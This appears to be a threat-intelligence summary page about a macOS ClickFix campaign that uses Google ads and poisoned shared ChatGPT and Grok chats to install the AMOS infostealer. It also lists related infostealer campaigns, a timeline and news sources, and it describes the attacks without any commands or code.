MacOS infostealer campaign using fake ads and ClickFix lures
Campaign
Summary
Hide ▲
Show ▼
macOS users are being targeted in a ClickFix campaign that abuses Google search ads to steer people into poisoned ChatGPT and Grok conversations. The lure uses troubleshooting queries and Atlas-related searches to deliver instructions that, if run in macOS Terminal, decode a base64-encoded URL and launch a bash script that installs AMOS infostealer malware with root-level privileges. The activity matters because AMOS is a macOS-only malware-as-a-service operation, and the campaign shows threat actors abusing legitimate AI platforms and search infrastructure to distribute malware.
Related Happenings
SHub Reaper macOS infostealer variant
Malware Activity
First: 19.05.2026 00:42
Last: 19.05.2026 00:42
Sources 1
About this happening:
The **SHub Reaper** macOS infostealer now uses **AppleScript** and a fake **Apple security update** lure to infect Macs, raising the risk of credential theft and remote access. It...
SHub Reaper macOS infostealer variant
Malware ActivityAbout this happening: The **SHub Reaper** macOS infostealer now uses **AppleScript** and a fake **Apple security update** lure to infect Macs, raising the risk of credential theft and remote access. It...
Mini Shai-Hulud npm supply-chain malware wave
Malware Activity
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
Mini Shai-Hulud npm supply-chain malware wave
Malware ActivityAbout this happening: The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
Fake Claude Code installation-page infostealer campaign targeting developers
Campaign
First: 11.05.2026 17:00
Last: 11.05.2026 17:00
Sources 1
About this happening:
A **fake Claude Code** installer campaign is using **sponsored search results** and **operator-controlled domains** to deliver an **infostealer** to **developer workstations**, pu...
Fake Claude Code installation-page infostealer campaign targeting developers
CampaignAbout this happening: A **fake Claude Code** installer campaign is using **sponsored search results** and **operator-controlled domains** to deliver an **infostealer** to **developer workstations**, pu...
Open-OSS/privacy-filter Hugging Face infostealer activity
Malware Activity
First: 11.05.2026 10:05
Last: 11.05.2026 10:05
Sources 1
About this happening:
A malicious **Hugging Face repository** called **Open-OSS/privacy-filter** impersonated **OpenAI's Privacy Filter** and delivered a **Rust-based information stealer** to **Windows...
Open-OSS/privacy-filter Hugging Face infostealer activity
Malware ActivityAbout this happening: A malicious **Hugging Face repository** called **Open-OSS/privacy-filter** impersonated **OpenAI's Privacy Filter** and delivered a **Rust-based information stealer** to **Windows...
Vidar Stealer ClickFix campaign targeting multiple sectors
Campaign
First: 08.05.2026 14:00
Last: 08.05.2026 14:00
Sources 1
About this happening:
The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Vidar Stealer ClickFix campaign targeting multiple sectors
CampaignAbout this happening: The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Timeline
-
04.02.2026 09:42 6 articles · 3mo ago
Microsoft warns on expanding macOS infostealer campaigns
Initial DisclosureMicrosoft warned that information-stealing campaigns are rapidly expanding beyond Windows to Apple macOS environments, using Python, malicious Google Ads redirects, ClickFix lures, and fake sites to deliver DMG installers that deploy Atomic macOS Stealer (AMOS), MacSync, DigitStealer, and PXA Stealer. The activity uses fileless execution, native macOS utilities, AppleScript automation, registry Run keys or scheduled tasks, and Telegram-based communications and exfiltration, while related campaigns also used WhatsApp and Crystal PDF decoys. The theft targets browser credentials, session data, iCloud Keychain entries, developer secrets, financial information, and crypto wallet data, and the recommended defenses are user education, Terminal monitoring, iCloud Keychain monitoring, and inspection of network egress for suspicious POST requests.
Show sources
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
- Hackers abuse Google ads, Claude.ai chats to push Mac malware — www.bleepingcomputer.com — 10.05.2026 20:52
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50